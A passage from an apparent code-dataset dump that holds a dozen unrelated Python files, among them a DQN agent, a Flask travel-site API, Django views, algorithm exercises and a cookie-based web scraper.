kernel_name=\"uer_bert_tiny_zh\",\n labels=self.labels,\n device=\"cuda:0\" if torch.cuda.is_available() else \"cpu\"\n )\n\n self.model.load_model(model_saving_path)\n pass\n\n def predict(self, title, text):\n '''\n 模型预测返回结果\n :param input: 评估传入样例 {\"title\":\"文本\",\"text\":\"文本\"}\n :return: 模型预测成功之后返回给系统样例 {\"label\":\"文本\"}\n '''\n\n labelNum, exec_layer= self.model(title+text)\n\n labelText =self.Label2Char[labelNum]\n\n return {\"label\": labelText}\n\n\n\n\n\nif __name__ == '__main__':\n predict1 = Prediction()\n predict1.load_model()\n label = predict1.predict(\"肩膀脖子后背酸痛是怎么回事?\",\"我的工作主要是在电脑前,以前也有肩膀不舒服的感觉\")\n print(\"label:\",label)\n","repo_name":"TangYuan96/fastbert_MedicalClass_FlyAI","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29590535317","text":"my_list = [1, 2, 3]\r\n\r\n# in python anonymous funcs are defined by expression lambda\r\nprint(list(map(lambda x: x * 2, my_list)))\r\n\r\nfor items in map(lambda x: x * 2, my_list):\r\n print(items)\r\n\r\n\r\n# normal function\r\ndef my_func(num):\r\n if num % 2 == 0:\r\n return num\r\n else:\r\n return 'odd'\r\n\r\n\r\nmy_list = [2, 3, 6]\r\n# lambda expression of function with map\r\nprint(list(map(lambda num: num if num % 2 == 0 else 'odd', my_list)))\r\nprint(list(filter(lambda num: num if num % 2 == 0 else 'odd', 
my_list)))\r\n","repo_name":"theByteCoder/CorePython","sub_path":"lambdaFuncAndMap.py","file_name":"lambdaFuncAndMap.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8522834606","text":"import re\n\nclass NaiveFunctionParser:\n \"\"\"Naive function definition parser.\"\"\"\n\n TYPE_RE_PROG = re.compile(\n r'[a-zA-Z_][a-zA-Z0-9_:]*$')\n FUNCTION_RE_PROG = re.compile(\n r'(?:[a-zA-Z_][a-zA-Z0-9_:]*)\\s+([a-zA-Z_][a-zA-Z0-9_:]*)\\s*\\(.*\\)\\s*{')\n \"\"\"Regular expression that matches function definitions.\"\"\"\n\n KEYWORDS = set(['catch',\n 'if',\n 'for',\n 'switch',\n 'while'])\n \"\"\"White-listed C++ keywords that are definitely not function names.\"\"\"\n\n def __init__(self):\n self.current_function = None\n \"\"\"Current function name, or None.\"\"\"\n self.previous_line = None\n \"\"\"Previous line from a multi-line function declaration. e.g.:\n\n int\n myfunction\n (args)\n {\n ...\n }\n \"\"\"\n self.nesting = 0\n \"\"\"Nesting depth of braces.\"\"\"\n\n def parse_line(self, line):\n \"\"\"Parse function declarations in a source line.\n Multi-line declarations are supported so long as the follow the template:\n\n int\n myfunction\n (args)\n {\n\n Args:\n line (str): The line to parse.\n\n Returns:\n str: Current function name.\n \"\"\"\n ret = None\n line = line.strip()\n if line.startswith('(') and self.previous_line:\n # function name is on previous line.\n function_line = self.previous_line + line\n elif line.startswith(')') and self.previous_line:\n # close of argument list\n function_line = self.previous_line + line\n elif line == '{' and self.previous_line:\n # opening brace is on its own line\n function_line = self.previous_line + line\n elif self.previous_line and (self.previous_line.endswith('(') or self.previous_line.endswith(',')):\n # multi line arguments\n function_line = self.previous_line + line\n elif self.previous_line and NaiveFunctionParser.TYPE_RE_PROG.search(self.previous_line):\n # multi line return type\n function_line = self.previous_line + ' ' + line\n else:\n function_line = line\n if len(function_line) < 1000: # length check to prevent running regexp on over-long lines\n match = NaiveFunctionParser.FUNCTION_RE_PROG.search(function_line)\n else:\n match = None\n if match and not match.group(1) in NaiveFunctionParser.KEYWORDS:\n ret = self.current_function = match.group(1)\n self.nesting = 1\n self.previous_line = None\n elif line.lstrip().startswith('{') or line.rstrip().endswith('{'):\n self.nesting += 1\n if line.lstrip().startswith('}') or line.rstrip().endswith('}'):\n self.nesting -= 1\n if self.nesting <= 0:\n self.nesting = 0\n self.current_function = None\n self.previous_line = function_line\n return ret\n","repo_name":"aws/porting-advisor-for-graviton","sub_path":"src/advisor/parsers/naive_function_parser.py","file_name":"naive_function_parser.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"16"} +{"seq_id":"41021824908","text":"import numpy as np\nimport random\nfrom collections import namedtuple, deque\n\nfrom model import QNetwork\n\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nBUFFER_SIZE = int(1e5) # replay buffer size\nBATCH_SIZE = 64 # minibatch size\nGAMMA = 0.99 # discount factor\nTAU = 1e-3 # for soft update of target parameters\nLR = 5e-4 # learning rate \nUPDATE_EVERY = 4 # how often to update the 
network\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nclass PERDDQNAgent():\n '''Prioritzed Experience Replay & Double Q-Learning Agent'''\n\n def __init__(self, state_size, action_size,seed, \n e = 1e-1, alpha = 0.5, beta = 1.0 ):\n '''Initialize an Agent object.\n \n Params\n ======\n state_size (int): dimension of each state\n action_size (int): dimension of each action\n seed (int): random seed\n ''' \n self.alpha = alpha\n self.beta = beta\n self.e = e\n \n self.state_size = state_size\n self.action_size = action_size\n self.seed = random.seed(seed)\n\n # Q-Network\n self.qnetwork_local = QNetwork(state_size, action_size, seed).to(device)\n self.qnetwork_target = QNetwork(state_size, action_size, seed).to(device)\n self.optimizer = optim.Adam(self.qnetwork_local.parameters(), lr=LR)\n\n # Replay memory\n self.memory = ReplayBufferPrioritized(action_size, BUFFER_SIZE, BATCH_SIZE, seed)\n # Initialize time step (for updating every UPDATE_EVERY steps)\n self.t_step = 0\n \n # self.memory.add(state, action, reward, next_state, done)\n # self.memory.update_priorities(indices, priorities)\n \n \n \n \n def step(self, state, action, reward, next_state, done):\n # Save experience in replay memory\n self.memory.add(state, action, reward, next_state, done)\n \n # Learn every UPDATE_EVERY time steps.\n self.t_step = (self.t_step + 1) % UPDATE_EVERY\n if self.t_step == 0:\n # If enough samples are available in memory, get random subset and learn\n if len(self.memory) > BATCH_SIZE:\n experiences = self.memory.sample_prioritized(self.e, \n self.alpha,self.beta)\n self.learn(experiences, GAMMA)\n \n \n def act(self, state, eps=0.):\n \"\"\"Returns actions for given state as per current policy.\n \n Params\n ======\n state (array_like): current state\n eps (float): epsilon, for epsilon-greedy action selection\n \"\"\"\n state = torch.from_numpy(state).float().unsqueeze(0).to(device)\n self.qnetwork_local.eval() # For Evaluation. 
Turn Off certain layers, like drop off, normalization....\n with torch.no_grad():\n action_values = self.qnetwork_local(state)\n self.qnetwork_local.train()\n\n # Epsilon-greedy action selection\n if random.random() > eps:\n return np.argmax(action_values.cpu().data.numpy()) # copies the tensor to the CPU and numpy changes the tensor in the memorie to an array\n else:\n return random.choice(np.arange(self.action_size)) \n\n def learn(self, experiences, gamma):\n '''Update value parameters using given batch of experience tuples.\n Params\n ======\n experiences (Tuple[torch.Variable]): tuple of (s, a, r, s', done) tuples \n gamma (float): discount factor\n '''\n states, actions, rewards, next_states, dones, indices, weights = experiences\n \n \"*** YOUR CODE HERE ***\"\n # Double Q-Learning\n next_actions_local = self.qnetwork_local(next_states).detach().max(1)[1].unsqueeze(1)\n\n ## compute and minimize the loss\n Q_targets_next = self.qnetwork_target(next_states).gather(1,next_actions_local).detach()\n # Compute Q targets for current states \n Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))\n # Get expected Q values from local model\n Q_expected = self.qnetwork_local(states).gather(1, actions)\n # Compute loss\n loss = (Q_expected - Q_targets).pow(2)*weights\n # Compute TD-Error for PER\n priorities = loss.detach().numpy()*1.0 \n \n loss = loss.mean() \n \n # Minimize the loss\n self.optimizer.zero_grad()\n loss.backward()\n # PER Update TD-Error\n self.memory.update_priorities(indices, priorities)\n \n self.optimizer.step()\n \n # ------------------- update target network ------------------- #\n self.soft_update(self.qnetwork_local, self.qnetwork_target, TAU) \n \n def soft_update(self, local_model, target_model, tau):\n \"\"\"Soft update model parameters.\n θ_target = τ*θ_local + (1 - τ)*θ_target\n\n Params\n ======\n local_model (PyTorch model): weights will be copied from\n target_model (PyTorch model): weights will be copied to\n tau (float): interpolation parameter \n \"\"\"\n for target_param, local_param in zip(target_model.parameters(), local_model.parameters()):\n target_param.data.copy_(tau*local_param.data + (1.0-tau)*target_param.data)\n\n \n\nclass ReplayBufferPrioritized():\n '''Fixed-size buffer to store experience tuples with prioritized replay.'''\n # This code part is strongly inspired by this Repository: https://github.com/p-serna/rainbow-dqn/blob/master/dqn_agent.py\n\n def __init__(self, action_size, buffer_size, batch_size, seed):\n '''Initialize a ReplayBuffer with Prioritized replay object.\n Params\n ======\n action_size (int): dimension of each action\n buffer_size (int): maximum size of buffer\n batch_size (int): size of each training batch\n seed (int): random seed\n '''\n self.action_size = action_size\n self.memory = deque(maxlen=buffer_size) \n self.batch_size = batch_size\n self.experience = namedtuple(\"Experience\", field_names=[\"state\", \"action\", \"reward\", \"next_state\", \"done\"])\n self.seed = random.seed(seed)\n \n self.priorities = deque(maxlen=buffer_size) \n self.max_priority = 1.0\n \n def sample_prioritized(self, e, alpha, beta):\n '''Randomly sample a batch of experiences from memory with priority.'''\n \n # Calculating probabilities for priorities\n tderrors = np.asarray(self.priorities, dtype = np.float32).flatten()\n pis = (np.abs(tderrors)+e)**alpha\n pis = pis/pis.sum() \n \n # Random indices with probabilities pis\n indices = np.random.choice(len(self.memory), size=self.batch_size, p = pis)\n \n # Selecting episodes 
from memory\n states = torch.from_numpy(np.vstack([self.memory[idx].state for idx in indices])).float().to(device)\n actions = torch.from_numpy(np.vstack([self.memory[idx].action for idx in indices])).long().to(device)\n rewards = torch.from_numpy(np.vstack([self.memory[idx].reward for idx in indices])).float().to(device)\n next_states = torch.from_numpy(np.vstack([self.memory[idx].next_state for idx in indices])).float().to(device)\n dones = torch.from_numpy(np.vstack([self.memory[idx].done for idx in indices]).astype(np.uint8)).float().to(device)\n \n # Importance sampling \n weights = 1.0/(len(tderrors)*pis[indices])**(beta)\n # Reshape is needed because the flattening at the beginning screw dimensions\n weights = (weights/weights.max()).reshape(weights.shape[0],1)\n weights = torch.from_numpy(weights).float().to(device)\n \n \n return (states, actions, rewards, next_states, dones, indices, weights)\n \n def __len__(self):\n \"\"\"Return the current size of internal memory.\"\"\"\n return len(self.memory) \n \n def add(self, state, action, reward, next_state, done):\n '''Add a new experience to memory.'''\n \n e = self.experience(state, action, reward, next_state, done)\n self.memory.append(e)\n self.priorities.append(self.max_priority) # First income allocated with max Prio so that all incomes are seen at least once\n \n def update_priorities(self, indices, tderrors):\n '''Update priorities array with new tderrors'''\n self.max_priority = np.max([self.max_priority,tderrors.max()])\n for idx, tde in zip(indices,tderrors):\n self.priorities[idx] = tde\n ","repo_name":"DiegelD/Deep-Reinforcement-Learning-ND","sub_path":"p1_navigation/per_agent.py","file_name":"per_agent.py","file_ext":"py","file_size_in_byte":8753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3179432151","text":"# 이항계수2_BOJ11051\n\n# input.txt 열기\nimport sys\nsys.stdin = open('input.txt')\n\n# input 받기\nN, K = map(int, sys.stdin.readline().split()) # 자연수 N과 정수 K를 받는다\n\ncnt = 1 # 계산결과를 저장할 변수를 생성하고\nfor i in range(N, N-K, -1): # N부터 1씩 작아지는 K개의 정수를 반복해서\n cnt *= i # cnt에 곱해주고\nfor j in range(1, K+1): # 1부터 1씩 증가하는 K개의 정수를 반복해서\n cnt //= j # cnt에 나눠준다\n\nprint(cnt % 10007) # 10007로 나눈 나머지를 출력한다","repo_name":"zer0eat/Algorithm","sub_path":"221108_1_이항계수2_BOJ11051/221108_이항계수2_BOJ11051.py","file_name":"221108_이항계수2_BOJ11051.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"8731473699","text":"\r\nimport random\r\n\r\nclass Blob:\r\n\r\n colors = ['red','yellow','green' ]\r\n \r\n def __init__(self, name = 0):\r\n \r\n self.blob_color = random.choice(Blob.colors)\r\n self.years = 0\r\n self.alive = True\r\n self.been_dead = None\r\n self.genes = [random.randint(1,10) for _ in range(10)]\r\n self.replicate = [.1, .25, .4][Blob.colors.index(self.blob_color)]\r\n self.name = name\r\n\r\n def age(self,):\r\n\r\n chance_of_death = (100 - sum(self.genes))/100\r\n self.die = random.random()\r\n\r\n if self.alive:\r\n self.years += 1\r\n if self.die < chance_of_death:\r\n self.alive = False\r\n \r\n if not self.alive:\r\n if self.been_dead == None:\r\n self.been_dead = 0\r\n else:\r\n self.been_dead += 1\r\n \r\n \r\n def __str__(self,):\r\n if self.alive == True:\r\n return f'{self.name} is a {self.blob_color} blob. He is currently {self.years} years old.'\r\n else:\r\n return f'{self.name} was a {self.blob_color} blob. 
He lived to be {self.years} years old and died {self.been_dead} years ago.'\r\n \r\n\r\n\r\n","repo_name":"TylerJAndrews/Python","sub_path":"Blobpath/blob.py","file_name":"blob.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20188439241","text":"# 작업(2056)\n# https://www.acmicpc.net/problem/2056\n# 못품(21.09.09)\n\n# from sys import stdin\n# from collections import deque\n\n# def topology_sort():\n# result = []\n# q = deque()\n\n# for i in range(1, N + 1):\n# if indegree[i] == 0:\n# q.append(i)\n# while q:\n# now = q.popleft()\n# # 동시에 작업을 실행할 경우\n# if len(q) >= 1:\n# for idx in q:\n# time[idx] = time[idx] - time[now] \n# if time[idx] < 0:\n# time[idx] = 0 \n# result.append(time[now])\n \n# for i in graph[now]:\n# indegree[i] -= 1\n \n# if indegree[i] == 0:\n# q.append(i)\n# return result\n\n# if __name__ == '__main__':\n# input = stdin.readline\n# N = int(input())\n# res = 0\n# indegree = [0] * (N + 1)\n# graph = [[] for _ in range(N + 1)]\n# time = [0] * (N + 1)\n\n# for i in range(1, N + 1):\n# # 걸리는 시간, 선행 작업들 개수, 선행 관계에 있는 작업들 번호 \n# lst = list(map(int, input().split()))\n# time[i] = lst[0]\n# if lst[1] >= 1:\n# # 진입 차수 만들기\n# indegree[i] += lst[1]\n# tmps = lst[2:]\n# for tmp in tmps:\n# # 그래프 만들기(목적지와, 걸리는 시간) \n# graph[tmp].append(i)\n# print(sum(topology_sort()))\n\nimport sys\ninput = sys.stdin.readline\n\nif __name__ == '__main__':\n N = int(input())\n costs = [0]*(N+1)\n\n for i in range(1, N+1):\n cur_input = list(map(int, input().split()))\n\n prev_max_time = 0\n for j in range(2, 2 + cur_input[1]):\n prev_max_time = max(prev_max_time, costs[cur_input[j]])\n\n costs[i] = prev_max_time + cur_input[0]\n\n print(max(costs))","repo_name":"jongwanra/TIL","sub_path":"python_baekjoon/topological_sorting/2056.py","file_name":"2056.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"8810080871","text":"from flask import *\nimport mysql.connector\nimport ast\napp=Flask(__name__)\napp.config[\"JSON_AS_ASCII\"]=False\napp.config[\"TEMPLATES_AUTO_RELOAD\"]=True\n\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"12345678\", #demo\n database=\"taipei_day_trip\"\n)\n\n# Pages\n@app.route(\"/\")\ndef index():\n\treturn render_template(\"index.html\")\n@app.route(\"/attraction/\")\ndef attraction(id):\n\treturn render_template(\"attraction.html\")\n@app.route(\"/booking\")\ndef booking():\n\treturn render_template(\"booking.html\")\n@app.route(\"/thankyou\")\ndef thankyou():\n\treturn render_template(\"thankyou.html\")\n\n# 旅遊景點API\n@app.route(\"/api/attractions\", methods=[\"GET\"])\ndef get_attractions_info():\n\tpage=request.args.get(\"page\", 0)\n\tpage=int(page)\n\tkeyword=request.args.get(\"keyword\", None)\n\tmycursor = mydb.cursor()\n\ttry:\n\t\tif keyword != None:\n\t\t\toffset=page*12\n\t\t\tsql=\"SELECT * FROM sites WHERE category=%s OR name LIKE %s ORDER BY id LIMIT %s, 12\"\n\t\t\tval=(keyword, \"%\"+keyword+\"%\", offset)\n\t\t\tmycursor.execute(sql, 
val)\n\t\t\tattractions_info=mycursor.fetchall()\n\t\t\tdata=[\n\t\t\t\t{\n\t\t\t\t\"id\":id,\n\t\t\t\t\"name\":name,\n\t\t\t\t\"category\":category,\n\t\t\t\t\"description\":description,\n\t\t\t\t\"address\":address,\n\t\t\t\t\"transport\":transport,\n\t\t\t\t\"mrt\":mrt,\n\t\t\t\t\"lat\":float(lat),\n\t\t\t\t\"lng\":float(lng),\n\t\t\t\t\"images\":ast.literal_eval(images)\n\t\t\t\t}\n\t\t\t\tfor id, name, category, description, address, transport, mrt, lat, lng, images in attractions_info\n\t\t\t\t]\n\t\t\t#處理nextPage\n\t\t\tsql=\"SELECT COUNT(id) FROM sites WHERE category=%s OR name LIKE %s\"\n\t\t\tval=(keyword, \"%\"+keyword+\"%\")\n\t\t\tmycursor.execute(sql, val)\n\t\t\ttotal_attractions_num=mycursor.fetchone()\n\t\t\ttotal_attractions_num=total_attractions_num[0]\n\t\t\ttotal_pages=total_attractions_num/12\n\t\t\tif page+1 < total_pages:\n\t\t\t\tnextPage=page+1\n\t\t\t\treturn jsonify({\"data\":data, \"nextPage\":nextPage})\n\t\t\telif page+1 >= total_pages:\n\t\t\t\tnextPage=None\n\t\t\t\treturn jsonify({\"data\":data, \"nextPage\":nextPage})\n\t\telif keyword == None:\n\t\t\toffset=page*12\n\t\t\tsql=\"SELECT * FROM sites ORDER BY id LIMIT %s, 12\"\n\t\t\tval=(offset,)\n\t\t\tmycursor.execute(sql, val)\n\t\t\tattractions_info=mycursor.fetchall()\n\t\t\tdata=[\n\t\t\t\t{\n\t\t\t\t\"id\":id,\n\t\t\t\t\"name\":name,\n\t\t\t\t\"category\":category,\n\t\t\t\t\"description\":description,\n\t\t\t\t\"address\":address,\n\t\t\t\t\"transport\":transport,\n\t\t\t\t\"mrt\":mrt,\n\t\t\t\t\"lat\":float(lat),\n\t\t\t\t\"lng\":float(lng),\n\t\t\t\t\"images\":ast.literal_eval(images)\n\t\t\t\t}\n\t\t\t\tfor id, name, category, description, address, transport, mrt, lat, lng, images in attractions_info\n\t\t\t\t]\n\t\t\t#處理nextPage\n\t\t\tsql=\"SELECT COUNT(id) FROM sites\"\n\t\t\tmycursor.execute(sql)\n\t\t\ttotal_attractions_num=mycursor.fetchone()\n\t\t\ttotal_attractions_num=total_attractions_num[0]\n\t\t\ttotal_pages=total_attractions_num/12\n\t\t\tif page+1 < total_pages:\n\t\t\t\tnextPage=page+1\n\t\t\t\treturn jsonify({\"data\":data, \"nextPage\":nextPage})\n\t\t\telif page+1 >= total_pages:\n\t\t\t\tnextPage=None\n\t\t\t\treturn jsonify({\"data\":data, \"nextPage\":nextPage})\n\texcept Exception:\n\t\terr_json_message={\"error\": True, \"message\": \"Server Error\"}\n\t\treturn jsonify(err_json_message)\n\n# 報錯設定\n@app.errorhandler(400)\ndef Bad_request(e):\n return jsonify({\"error\": True, \"message\": \"Bad request\"}), 400\t\n\n# 旅遊景點API\n@app.route(\"/api/attraction/\", methods=[\"GET\"])\ndef get_attractions_byID(attractionID):\n\tmycursor = mydb.cursor()\n\tif str(attractionID).isdigit() is False:\n\t\tabort(400)\n\ttry:\n\t\tif str(attractionID).isdigit() is True:\n\t\t\tsql=\"SELECT * FROM sites WHERE id=%s \"\n\t\t\tval=(attractionID,)\n\t\t\tmycursor.execute(sql, val)\n\t\t\tattraction_info=mycursor.fetchone()\n\t\t\tif attraction_info is None:\n\t\t\t\treturn 
jsonify({\"data\":None})\n\t\t\telse:\n\t\t\t\tid=attraction_info[0]\n\t\t\t\tname=attraction_info[1]\n\t\t\t\tcategory=attraction_info[2]\n\t\t\t\tdescription=attraction_info[3]\n\t\t\t\taddress=attraction_info[4]\n\t\t\t\ttransport=attraction_info[5]\n\t\t\t\tmrt=attraction_info[6]\n\t\t\t\tlat=float(attraction_info[7])\n\t\t\t\tlng=float(attraction_info[8])\n\t\t\t\timages=ast.literal_eval(attraction_info[9])\n\t\t\t\tdata={\"data\":{\n\t\t\t\t\t\"id\":id,\n\t\t\t\t\t\"name\":name,\n\t\t\t\t\t\"category\":category,\n\t\t\t\t\t\"description\":description,\n\t\t\t\t\t\"address\":address,\n\t\t\t\t\t\"transport\":transport,\n\t\t\t\t\t\"mrt\":mrt,\n\t\t\t\t\t\"lat\":lat,\n\t\t\t\t\t\"lng\":lng,\n\t\t\t\t\t\"images\":images\n\t\t\t\t\t}}\n\t\t\t\treturn jsonify(data)\n\texcept Exception:\n\t\terr_json_message={\"error\": True, \"message\": \"Server Error\"}\n\t\treturn jsonify(err_json_message)\n\n# 旅遊景點分類API\n@app.route(\"/api/categories\", methods=[\"GET\"])\ndef get_attractions_categories():\n\tmycursor = mydb.cursor()\n\ttry:\n\t\tmycursor.execute(\"SELECT DISTINCT category FROM sites\")\n\t\tcategories=mycursor.fetchall()\n\t\tcategory_list=list(map(''.join, categories))\n\t\treturn jsonify({\"data\":category_list})\n\texcept Exception:\n\t\terr_json_message={\"error\": True, \"message\": \"Server Error\"}\n\t\treturn jsonify(err_json_message)\n\n\napp.run(host='0.0.0.0', port=3000)","repo_name":"Chung1178/WeHelp-Stage2","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74223408969","text":"class Solution:\n def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n if len(s1) + len(s2) != len(s3):\n return False\n if not s1:\n return s2 == s3\n if not s2:\n return s1 == s3\n\n # Initialize the previous row of the dp array\n prev = [True] + [False] * len(s2)\n\n # Fill in the dp array row by row\n for i in range(1, len(s1) + 1):\n # Initialize the current row of the dp array\n curr = [False] * (len(s2) + 1)\n curr[0] = prev[0] and s1[i - 1] == s3[i - 1]\n\n for j in range(1, len(s2) + 1):\n curr[j] = (prev[j] and s1[i - 1] == s3[i + j - 1]) or (\n curr[j - 1] and s2[j - 1] == s3[i + j - 1]\n )\n\n # Update the previous row\n prev = curr\n\n return prev[-1]\n","repo_name":"proModeLife/InternPrep","sub_path":"Leetcode/Dynamic_Programming/Interleaving_String.py","file_name":"Interleaving_String.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4684323155","text":"from django.shortcuts import render, redirect\nfrom django.views.generic import TemplateView\n\nfrom destination.models import (\n Country, \n Destination,\n Lodging\n)\nfrom users.models import Testimoni\n\nclass Index(TemplateView):\n template_name = 'destination/index.html'\n \n def get(self, request, *args, **kwargs):\n if 'country' in kwargs and not Country.objects.filter(name=kwargs['country'].upper()).exists():\n return redirect('destination:index')\n return render(self.request, self.template_name, self.get_context_data())\n \n def get_context_data(self, **kwargs):\n context = {\n 'destinationActive': 'active',\n 'listCountry': Country.objects.all().order_by('name'),\n 'listTestimoni': Testimoni.objects.filter(is_show=True),\n 'country': None,\n 'place': 'Destinations',\n 'title_blocks_cover': 'Destinations'\n }\n \n if 'country' in kwargs and kwargs['country'] != None:\n 
context['country'] = kwargs['country']\n country = Country.objects.get(name=kwargs['country'].upper())\n context['listDestination'] = Destination.objects.filter(country=country)\n else:\n context['listDestination'] = Destination.objects.all()\n context['country'] = None\n return context\n \nclass DestinationDetail(TemplateView):\n template_name = 'destination/destinationDetail.html'\n\n def get(self, request, *args, **kwargs):\n if not Destination.objects.filter(country=Country.objects.get(name=kwargs['country'].upper()), slug=kwargs['name']).exists():\n return redirect('destination:index')\n \n destination = Destination.objects.get(country=Country.objects.get(name=kwargs['country'].upper()), slug=kwargs['name'])\n context = self.get_context_data()\n context['destination'] = destination\n context['title_blocks_cover'] = destination.name\n print(len(Lodging.objects.filter(destination=destination)))\n context['listLodging'] = Lodging.objects.filter(destination=destination)\n return render(request, self.template_name, context)\n \n def get_context_data(self, **kwargs):\n \n context = {\n 'place': 'Destination',\n 'destinationActive': 'active',\n 'listCountry': Country.objects.all().order_by('name'),\n }\n return context\n ","repo_name":"zeetec20/travel","sub_path":"destination/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"18628936050","text":"import requests\nfrom requests import session\nfrom lxml import etree\nfrom selenium import webdriver\n\n# url = 'https://www.cnhnb.com/p/niurou/'\n# headers = {\n# 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n# 'Accept-Encoding':'gzip, deflate, br',\n# 'Accept-Language':'zh-CN,zh;q=0.9',\n# 'Cache-Control':'max-age=0',\n# 'Connection':'keep-alive',\n# 'Cookie': 'deviceId=5481276-a4eb-4305-852d-1e23fb671; sessionId=S_0KTUSNHQC8YWGM28; Hm_lvt_91cf34f62b9bedb16460ca36cf192f4c=1631954226,1632272070,1632274864,1632282578; hnUserTicket=8468fd4c-c852-4667-a91a-ec43809a192c; hnUserId=883248472; Hm_lpvt_91cf34f62b9bedb16460ca36cf192f4c=1632282601',\n# 'Host':'www.cnhnb.com',\n# 'If-None-Match':'\"1f484-ROIISghOjy0EqWeIVe1hQwQwFOk\"',\n# 'Referer':'https://www.cnhnb.com/p/niurou/',\n# 'sec-ch-ua':'\"Google Chrome\";v=\"95\", \"Chromium\";v=\"95\", \";Not A Brand\";v=\"99\"',\n# 'sec-ch-ua-mobile':'?0',\n# 'sec-ch-ua-platform':'\"Windows\"',\n# 'Sec-Fetch-Dest':'document',\n# 'Sec-Fetch-Mode':'navigate',\n# 'Sec-Fetch-Site':'same-origin',\n# 'Sec-Fetch-User':'?1',\n# 'Upgrade-Insecure-Requests':'1',\n# 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4636.4 Safari/537.36',\n# }\n# session = session()\n# response = session.get(url=url,headers=headers)\n# cookies = response.cookies.get_dict()\n# html = etree.HTML(response.text)\n# urlList = html.xpath('//div[@class=\"supply-item\"]/div/a/@href')\n# print(cookies)\n\n# for per_url in urlList:\n# detail_url = 'https://www.cnhnb.com'+per_url\n#\n# chrome = webdriver.Chrome()\n# chrome.add_cookie()\n\nchrome = webdriver.Chrome()\ncookie_deviceId={'name':'deviceId','value':'b25c886-ff33-4ca9-9977-ee95c47be','domain': 'www.cnhnb.com','path': '/'}\ncookie_Hm_lpvt_91cf34f62b9bedb16460ca36cf192f4c={'name':'Hm_lpvt_91cf34f62b9bedb16460ca36cf192f4c','value':'1632284099','domain': '.cnhnb.com','path': 
'/'}\ncookie_Hm_lvt_9aa0ee2c8e00d046f6d1631cf46da4b6={'name':'Hm_lvt_9aa0ee2c8e00d046f6d1631cf46da4b6','value':'1631674382','domain': '.www.cnhnb.com','path': '/'}\ncookie_Hm_lvt_91cf34f62b9bedb16460ca36cf192f4c={'name':'Hm_lvt_91cf34f62b9bedb16460ca36cf192f4c','value':'1631673979,1631674382,1632284074','domain': '.cnhnb.com','path': '/'}\ncookie_Hm_lvt_hnUserId={'name':'hnUserId','value':'883248472','domain': '.cnhnb.com','path': '/'}\ncookie_Hm_lvt_hnUserTicket={'name':'hnUserTicket','value':'fe26ac7d-dae9-48f2-94f0-6405fd0e8bc9','domain': '.cnhnb.com','path': '/'}\ncookie_Hm_lvt_sessionId={'name':'sessionId','value':'S_0KTUZSH7A41OX59O','domain': 'www.cnhnb.com','path': '/'}\n\nchrome.add_cookie(cookie_deviceId)\nchrome.add_cookie(cookie_Hm_lpvt_91cf34f62b9bedb16460ca36cf192f4c)\nchrome.add_cookie(cookie_Hm_lvt_9aa0ee2c8e00d046f6d1631cf46da4b6)\nchrome.add_cookie(cookie_Hm_lvt_91cf34f62b9bedb16460ca36cf192f4c)\nchrome.add_cookie(cookie_Hm_lvt_hnUserId)\nchrome.add_cookie(cookie_Hm_lvt_hnUserTicket)\nchrome.add_cookie(cookie_Hm_lvt_sessionId)\nchrome.get('https://www.cnhnb.com/gongying/6038342/')","repo_name":"CuiXiangTuT/MyProject","sub_path":"WebCrawler/惠农网/惠农网供应大厅.py","file_name":"惠农网供应大厅.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"6830025674","text":"import pandas as pd\nimport requests\nfrom io import BytesIO\nimport gzip\nimport logging\nfrom docs import config\n\n\ndef get_file():\n \"\"\"Grabs the file from the Google drive and loads it into a pandas dataframe. Parses date and time column into timestamp column\n\n Returns\n -------\n df : pandas dataframe\n dataframe that contains all file rows without duplicates\n \"\"\"\n logging.info('Extracting file ...')\n file_id = config.ORIG_URL.split('/')[-2]\n dwn_url = 'https://drive.google.com/uc?export=download&id=' + file_id\n\n response = requests.get(dwn_url)\n if response.status_code != 200:\n logging.error('Error downloading file: {} {}'.format(response.status_code, response.content))\n return None\n else:\n df = open_gzip_read_tsv(BytesIO(response.content))\n\n logging.info('Total number of lines in the file: {}'.format(df.shape[0]))\n df.drop_duplicates(keep='last', inplace=True)\n logging.info('Total number of lines in the file after removing duplicates: {}'.format(df.shape[0]))\n # Added for events_log table PK\n df['raw_event'] = df[['date', 'time', 'user_id', 'url', 'ip', 'user_agent_string']].apply(lambda x: ''.join(x),\n axis=1)\n df['date'] = df['date'] + ' ' + df['time']\n df.rename(columns={'date': 